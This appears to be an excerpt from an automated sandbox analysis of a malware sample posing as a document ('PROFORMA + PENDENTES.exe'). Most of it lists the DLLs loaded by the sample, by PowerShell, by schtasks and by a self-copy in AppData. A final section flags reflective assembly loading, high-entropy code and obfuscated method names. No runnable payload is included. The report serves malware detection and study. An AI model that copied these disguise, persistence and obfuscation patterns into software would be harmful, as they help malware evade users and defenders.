              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: PROFORMA + PENDENTES.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PROFORMA + PENDENTES.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs.Net Code: MClBM5h2k3 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs.Net Code: MClBM5h2k3 System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A4658 push edx; ret 0_2_025A465A
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A469B push edx; ret 0_2_025A469E
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A469F push edx; ret 0_2_025A46A2
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A475B push esi; ret 0_2_025A4762
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A4759 push esi; ret 0_2_025A475A
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A4790 push esi; ret 0_2_025A4792
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 0_2_025A5F08 push esp; ret 0_2_025A60E9
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeCode function: 11_2_00FF24B9 push 8BFFFFFFh; retf 11_2_00FF24BF
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 12_2_05CF6E47 push eax; mov dword ptr [esp], edx12_2_05CF6E5C
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A24B9 push 8BFFFFFFh; retf 16_2_013A24BF
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeCode function: 16_2_013A9692 push 00000066h; retf 16_2_013A9694
              Source: PROFORMA + PENDENTES.exeStatic PE information: section name: .text entropy: 7.8959477360806245
              Source: WYqxTmjfOgdZ.exe.0.drStatic PE information: section name: .text entropy: 7.8959477360806245
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, P9YhaUQTPWGmrkJYOM.csHigh entropy of concatenated method names: 'XIVp6ONf92cjxwcseuR', 'qoC1rfNeGjdpd8pKvlj', 'PGxaLkNxItsr69fUPsO', 'hD6b84ho97', 'NqDbE8YaP5', 'jAFbvfIW7F', 'YQSaXbNbxSDTfYZ4m4w', 'Qm8np7NyHuBI2beEffw'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, X8UiX2cvtnoE290aLy.csHigh entropy of concatenated method names: 'RHyl0mtZMt', 'zgFlP4G9OF', 'jQXldykwxZ', 'CMMloiqeV6', 'eHHlyMSkho', 'rRglLpIJvC', 'M2Qlpk5R6V', 'gj2ln5646D', 'uOplN2Y6Xn', 'imWlWgDR5k'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, OPHIWV1rONTdneeeKQ.csHigh entropy of concatenated method names: 'EuGV6Er0jb', 'REaVKLtjUw', 'jHxVbh2hT2', 'cYNb9QXQda', 'XLlbzbIToe', 'PlsVcGB1hk', 'oV5VjIaSbm', 'a6UVu7G666', 'qupVXrICXs', 'd1nVB4f1LA'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, LhTHsGF4RMAZGCa8kn.csHigh entropy of concatenated method names: 'FQnjVoQgwf', 'ltxjFCoTG0', 'H7yjfXKfBO', 'WaRjSZLE8e', 'K0DjldFJwK', 'C6fjA7va4P', 'VvV8Rud3PZC59uom7a', 'VPd6f1cXlKyQQJTTwa', 'KttjjPFT0d', 'vlYjXT8kOD'
